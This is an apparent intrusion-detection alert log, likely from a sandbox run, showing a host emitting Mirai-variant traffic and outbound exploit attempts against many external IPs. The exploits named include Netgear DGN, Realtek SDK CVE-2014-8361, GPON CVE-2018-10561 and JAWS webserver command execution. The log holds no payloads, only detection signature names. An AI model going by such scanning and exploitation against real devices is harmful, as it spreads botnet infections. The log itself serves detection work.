                                                                        2024-12-06T00:37:51.892389+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234421230.169.244.4749152TCP
                                                                        2024-12-06T00:37:51.901885+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346612220.55.179.6880TCP
                                                                        2024-12-06T00:37:51.901885+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346612220.55.179.6880TCP
                                                                        2024-12-06T00:37:51.903717+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235649039.203.165.1952869TCP
                                                                        2024-12-06T00:37:51.904086+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344100221.5.55.1448080TCP
                                                                        2024-12-06T00:37:51.920526+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233343043.228.53.2387574TCP
                                                                        2024-12-06T00:37:51.920902+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347916159.220.97.548080TCP
                                                                        2024-12-06T00:37:52.835020+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235988629.112.84.23880TCP
                                                                        2024-12-06T00:37:52.854356+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360928219.172.167.23249152TCP
                                                                        2024-12-06T00:37:52.876159+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233448075.240.32.6952869TCP
                                                                        2024-12-06T00:37:52.880888+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334082187.24.223.9580TCP
                                                                        2024-12-06T00:37:52.880888+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334082187.24.223.9580TCP
                                                                        2024-12-06T00:37:52.888880+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337122177.57.9.2380TCP
                                                                        2024-12-06T00:37:52.895084+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23441805.90.227.15880TCP
                                                                        2024-12-06T00:37:52.896544+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234936233.158.189.107574TCP
                                                                        2024-12-06T00:37:52.900927+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349564213.203.3.1927574TCP
                                                                        2024-12-06T00:37:52.909030+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233544018.7.31.23849152TCP
                                                                        2024-12-06T00:37:52.909401+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346036158.87.81.1655555TCP
                                                                        2024-12-06T00:37:52.911951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234108841.217.83.2415555TCP
                                                                        2024-12-06T00:37:52.938889+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351388157.118.15.1605555TCP
                                                                        2024-12-06T00:37:52.963372+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345912102.222.97.118080TCP
                                                                        2024-12-06T00:37:53.119635+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234230818.187.138.458080TCP
                                                                        2024-12-06T00:37:53.837799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234918442.34.149.558080TCP
                                                                        2024-12-06T00:37:53.846913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347748125.101.103.1345555TCP
                                                                        2024-12-06T00:37:53.891624+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234267442.109.51.2268080TCP
                                                                        2024-12-06T00:37:53.907252+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345222214.131.241.6580TCP
                                                                        2024-12-06T00:37:53.907252+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345222214.131.241.6580TCP
                                                                        2024-12-06T00:37:53.913434+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345946151.165.125.2068080TCP
                                                                        2024-12-06T00:37:53.917076+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350108138.219.83.10480TCP
                                                                        2024-12-06T00:37:53.917076+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350108138.219.83.10480TCP
                                                                        2024-12-06T00:37:53.921441+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357386102.231.30.2375555TCP
                                                                        2024-12-06T00:37:53.924360+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234375867.6.149.38080TCP
                                                                        2024-12-06T00:37:53.937804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339726121.115.59.1217574TCP
                                                                        2024-12-06T00:37:54.072832+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347434216.28.230.2080TCP
                                                                        2024-12-06T00:37:54.072899+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336648190.159.44.1938080TCP
                                                                        2024-12-06T00:37:54.839940+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343964113.210.221.11249152TCP
                                                                        2024-12-06T00:37:54.865340+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343654148.131.165.3980TCP
                                                                        2024-12-06T00:37:54.866091+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359496193.56.19.21280TCP
                                                                        2024-12-06T00:37:54.870820+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235244444.156.127.19849152TCP
                                                                        2024-12-06T00:37:54.871194+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234353287.103.58.817574TCP
                                                                        2024-12-06T00:37:54.873742+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343950137.99.92.1517574TCP
                                                                        2024-12-06T00:37:54.874113+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233521818.170.145.2338080TCP
                                                                        2024-12-06T00:37:54.879214+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345518178.123.28.080TCP
                                                                        2024-12-06T00:37:54.924703+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356314151.209.199.18080TCP
                                                                        2024-12-06T00:37:54.924703+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356314151.209.199.18080TCP
                                                                        2024-12-06T00:37:54.929089+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23492085.165.147.1357574TCP
                                                                        2024-12-06T00:37:55.088395+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235741838.46.178.5580TCP
                                                                        2024-12-06T00:37:55.858528+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338188129.130.35.1055555TCP
                                                                        2024-12-06T00:37:55.858904+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23487023.187.63.1657574TCP
                                                                        2024-12-06T00:37:55.872560+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342880203.122.151.1545555TCP
                                                                        2024-12-06T00:37:55.881280+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234052081.194.155.2357574TCP
                                                                        2024-12-06T00:37:55.888555+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235436840.173.24.8880TCP
                                                                        2024-12-06T00:37:55.888555+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235436840.173.24.8880TCP
                                                                        2024-12-06T00:37:55.892570+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2340520172.44.39.2252869TCP
                                                                        2024-12-06T00:37:55.901309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235248263.42.193.557574TCP
                                                                        2024-12-06T00:37:55.915872+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346528132.95.148.10280TCP
                                                                        2024-12-06T00:37:55.930076+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233797671.243.183.2485555TCP
                                                                        2024-12-06T00:37:56.088614+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235602262.2.31.8880TCP
                                                                        2024-12-06T00:37:56.182594+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340008169.186.142.16880TCP
                                                                        2024-12-06T00:37:56.847554+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355288142.163.233.1787574TCP
                                                                        2024-12-06T00:37:56.858764+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336144139.201.152.080TCP
                                                                        2024-12-06T00:37:56.859489+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357152130.188.140.1118080TCP
                                                                        2024-12-06T00:37:56.864943+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23374162.138.200.378080TCP
                                                                        2024-12-06T00:37:56.871845+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235135284.242.229.18052869TCP
                                                                        2024-12-06T00:37:56.889989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234366246.217.77.1985555TCP
                                                                        2024-12-06T00:37:56.903433+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23493785.39.52.15280TCP
                                                                        2024-12-06T00:37:56.906353+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235663453.220.163.1107574TCP
                                                                        2024-12-06T00:37:57.026016+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347428102.34.229.758080TCP
                                                                        2024-12-06T00:37:57.026121+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23328686.70.46.1698080TCP
                                                                        2024-12-06T00:37:57.041619+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333470131.76.152.1388080TCP
                                                                        2024-12-06T00:37:57.041690+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23340926.79.28.20580TCP
                                                                        2024-12-06T00:37:57.855967+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347470109.183.98.2649152TCP
                                                                        2024-12-06T00:37:57.858021+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335564164.16.148.7480TCP
                                                                        2024-12-06T00:37:57.890584+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354980185.148.94.18949152TCP
                                                                        2024-12-06T00:37:57.896397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234554823.203.39.917574TCP
                                                                        2024-12-06T00:37:57.896761+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335108190.195.65.14280TCP
                                                                        2024-12-06T00:37:57.896761+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335108190.195.65.14280TCP
                                                                        2024-12-06T00:37:57.897486+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348884128.146.162.8880TCP
                                                                        2024-12-06T00:37:57.909901+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358866155.228.213.11480TCP
                                                                        2024-12-06T00:37:57.936796+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335340194.112.220.4649152TCP
                                                                        2024-12-06T00:37:57.937166+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354716151.253.19.648080TCP
                                                                        2024-12-06T00:37:57.937898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343040158.236.246.508080TCP
                                                                        2024-12-06T00:37:57.938992+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234626652.156.18.8180TCP
                                                                        2024-12-06T00:37:57.938992+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234626652.156.18.8180TCP
                                                                        2024-12-06T00:37:57.944064+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358832197.254.214.158080TCP
                                                                        2024-12-06T00:37:58.010540+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23607843.253.116.23280TCP
                                                                        2024-12-06T00:37:58.026006+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335868195.224.177.238080TCP
                                                                        2024-12-06T00:37:58.057089+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233496685.216.218.558080TCP
                                                                        2024-12-06T00:37:58.135516+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357372192.106.15.498080TCP
                                                                        2024-12-06T00:37:58.166592+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357276120.29.235.480TCP
                                                                        2024-12-06T00:37:58.833186+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355232179.215.178.77574TCP
                                                                        2024-12-06T00:37:58.839899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233994670.111.160.2525555TCP
                                                                        2024-12-06T00:37:58.844281+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236042633.213.27.2152869TCP
                                                                        2024-12-06T00:37:58.845017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235418259.184.68.2057574TCP
                                                                        2024-12-06T00:37:58.876319+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234698273.178.79.195555TCP
                                                                        2024-12-06T00:37:58.879241+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233743640.20.89.2388080TCP
                                                                        2024-12-06T00:37:58.894150+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357516209.134.136.17880TCP
                                                                        2024-12-06T00:37:58.894150+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357516209.134.136.17880TCP
                                                                        2024-12-06T00:37:58.894518+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2335652111.237.234.11552869TCP
                                                                        2024-12-06T00:37:58.901789+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233350025.231.32.16052869TCP
                                                                        2024-12-06T00:37:58.903575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233857488.143.142.5049152TCP
                                                                        2024-12-06T00:37:58.908329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235265013.155.15.2208080TCP
                                                                        2024-12-06T00:37:58.910844+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351190113.160.60.555555TCP
                                                                        2024-12-06T00:37:59.834766+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233394673.116.159.9852869TCP
                                                                        2024-12-06T00:37:59.835834+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234523657.12.72.17080TCP
                                                                        2024-12-06T00:37:59.835834+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234523657.12.72.17080TCP
                                                                        2024-12-06T00:37:59.863755+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347686130.70.89.14080TCP
                                                                        2024-12-06T00:37:59.865577+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235345295.197.13.1088080TCP
                                                                        2024-12-06T00:37:59.869935+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356736217.112.43.1797574TCP
                                                                        2024-12-06T00:37:59.885620+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233298675.209.29.11352869TCP
                                                                        2024-12-06T00:37:59.907153+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339400141.12.109.20180TCP
                                                                        2024-12-06T00:37:59.907153+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339400141.12.109.20180TCP
                                                                        2024-12-06T00:37:59.908971+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234992458.103.8.1878080TCP
                                                                        2024-12-06T00:38:00.041773+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342702134.87.227.8280TCP
                                                                        2024-12-06T00:38:00.041971+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337372116.235.110.918080TCP
                                                                        2024-12-06T00:38:00.042489+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334298106.58.97.4380TCP
                                                                        2024-12-06T00:38:00.847007+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338140202.33.3.22480TCP
                                                                        2024-12-06T00:38:00.847007+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338140202.33.3.22480TCP
                                                                        2024-12-06T00:38:00.859012+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346254135.88.227.1878080TCP
                                                                        2024-12-06T00:38:00.874206+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354796221.62.129.08080TCP
                                                                        2024-12-06T00:38:00.884031+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23541427.244.177.20280TCP
                                                                        2024-12-06T00:38:00.923986+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360830206.246.148.20880TCP
                                                                        2024-12-06T00:38:00.923986+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360830206.246.148.20880TCP
                                                                        2024-12-06T00:38:00.927981+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351796162.58.199.1898080TCP
                                                                        2024-12-06T00:38:00.963956+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234827640.184.62.11480TCP
                                                                        2024-12-06T00:38:00.995144+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333838202.134.81.2008080TCP
                                                                        2024-12-06T00:38:01.041575+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234041222.102.138.1338080TCP
                                                                        2024-12-06T00:38:01.842979+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341770134.223.123.5280TCP
                                                                        2024-12-06T00:38:01.851722+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352018171.187.9.17780TCP
                                                                        2024-12-06T00:38:01.858323+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343646102.1.172.2380TCP
                                                                        2024-12-06T00:38:01.858323+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343646102.1.172.2380TCP
                                                                        2024-12-06T00:38:01.900169+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235846629.85.49.9852869TCP
                                                                        2024-12-06T00:38:01.907411+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233548663.185.179.2749152TCP
                                                                        2024-12-06T00:38:01.907817+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235522093.71.112.22049152TCP
                                                                        2024-12-06T00:38:01.909420+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233726249.76.1.7780TCP
                                                                        2024-12-06T00:38:01.928801+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235742663.190.31.16949152TCP
                                                                        2024-12-06T00:38:01.963901+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234033040.161.115.848080TCP
                                                                        2024-12-06T00:38:02.840684+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359788101.46.15.20749152TCP
                                                                        2024-12-06T00:38:02.865950+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340474115.113.7.537574TCP
                                                                        2024-12-06T00:38:02.866313+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353272167.129.204.480TCP
                                                                        2024-12-06T00:38:02.866685+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355364205.31.52.1098080TCP
                                                                        2024-12-06T00:38:02.867399+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347160213.41.163.15580TCP
                                                                        2024-12-06T00:38:02.868504+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333648138.94.183.2468080TCP
                                                                        2024-12-06T00:38:02.868875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338386121.151.89.2168080TCP
                                                                        2024-12-06T00:38:02.875393+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332940131.143.101.795555TCP
                                                                        2024-12-06T00:38:02.881206+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233392459.130.197.6280TCP
                                                                        2024-12-06T00:38:02.895419+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2341614179.0.144.1552869TCP
                                                                        2024-12-06T00:38:02.898724+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236002259.113.95.375555TCP
                                                                        2024-12-06T00:38:02.921738+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23419025.217.33.19349152TCP
                                                                        2024-12-06T00:38:02.940510+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234998077.154.12.2952869TCP
                                                                        2024-12-06T00:38:03.010354+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234440820.192.54.698080TCP
                                                                        2024-12-06T00:38:03.057294+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234385889.209.200.1580TCP
                                                                        2024-12-06T00:38:03.727091+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235321443.159.50.15480TCP
                                                                        2024-12-06T00:38:03.727091+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235321443.159.50.15480TCP
                                                                        2024-12-06T00:38:03.836867+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338764183.236.176.1288080TCP
                                                                        2024-12-06T00:38:03.846375+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346700176.67.235.20280TCP
                                                                        2024-12-06T00:38:03.847846+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341848180.106.114.78080TCP
                                                                        2024-12-06T00:38:03.848249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346280118.214.95.458080TCP
                                                                        2024-12-06T00:38:03.856012+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235938091.48.246.23352869TCP
                                                                        2024-12-06T00:38:03.870673+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235697078.37.169.4180TCP
                                                                        2024-12-06T00:38:03.876356+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235580263.26.73.1168080TCP
                                                                        2024-12-06T00:38:03.903335+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234645421.243.154.15349152TCP
                                                                        2024-12-06T00:38:03.921165+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351124143.197.221.658080TCP
                                                                        2024-12-06T00:38:03.930515+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235949654.218.71.1098080TCP
                                                                        2024-12-06T00:38:03.940419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360502196.53.0.1125555TCP
                                                                        2024-12-06T00:38:03.964087+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23441805.90.227.15880TCP
                                                                        2024-12-06T00:38:04.855243+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235614850.122.24.1535555TCP
                                                                        2024-12-06T00:38:04.856333+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349594195.140.232.875555TCP
                                                                        2024-12-06T00:38:04.875053+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343080189.42.102.13480TCP
                                                                        2024-12-06T00:38:04.883038+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235533614.134.153.17680TCP
                                                                        2024-12-06T00:38:04.891140+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353204156.47.81.2228080TCP
                                                                        2024-12-06T00:38:04.897400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348866132.171.47.18849152TCP
                                                                        2024-12-06T00:38:04.922152+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339962100.192.1.175555TCP
                                                                        2024-12-06T00:38:04.929794+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356218195.29.145.25080TCP
                                                                        2024-12-06T00:38:04.937803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333756118.61.13.1608080TCP
                                                                        2024-12-06T00:38:04.938902+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354898142.238.188.25280TCP
                                                                        2024-12-06T00:38:04.938902+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354898142.238.188.25280TCP
                                                                        2024-12-06T00:38:04.941082+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234437054.82.67.3149152TCP
                                                                        2024-12-06T00:38:04.941446+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334486190.170.173.1328080TCP
                                                                        2024-12-06T00:38:04.941809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234358628.183.13.2438080TCP
                                                                        2024-12-06T00:38:04.942171+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234108070.99.243.1558080TCP
                                                                        2024-12-06T00:38:04.963790+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234375867.6.149.38080TCP
                                                                        2024-12-06T00:38:05.010596+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234918442.34.149.558080TCP
                                                                        2024-12-06T00:38:05.088666+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345946151.165.125.2068080TCP
                                                                        2024-12-06T00:38:05.839018+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343640161.39.199.21980TCP
                                                                        2024-12-06T00:38:05.839018+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343640161.39.199.21980TCP
                                                                        2024-12-06T00:38:05.849717+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235308464.223.220.5652869TCP
                                                                        2024-12-06T00:38:05.850107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343948111.73.240.178080TCP
                                                                        2024-12-06T00:38:05.850502+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348246170.16.125.20880TCP
                                                                        2024-12-06T00:38:05.855787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236012494.174.48.14480TCP
